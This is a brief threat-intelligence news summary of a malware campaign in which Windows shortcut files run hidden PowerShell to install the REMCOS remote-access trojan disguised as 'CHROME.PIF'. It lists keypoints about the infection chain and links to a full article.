A multi-stage malware campaign involves malicious Windows Shortcut files that secretly deploy the REMCOS remote-access trojan. This sophisticated attack encrypts its payloads and grants attackers extensive control over infected systems, including keystroke logging, file access, and spying through webcams and microphones. #REMCOS #LAT61
Keypoints
- The attack uses malicious LNK files to initiate the malware infection.
- PowerShell commands hidden within the LNK files download and decode encrypted payloads.
- The malware disguises the final payload as a legitimate-looking PIF file named βCHROME.PIFβ.
- Upon installation, REMCOS provides remote attackers with extensive control over the infected system.
- The C2 infrastructure is hosted in Romania and the US, emphasizing the global nature of the threat.
Read More: https://hackread.com/attack-windows-shortcut-files-install-remcos-backdoor/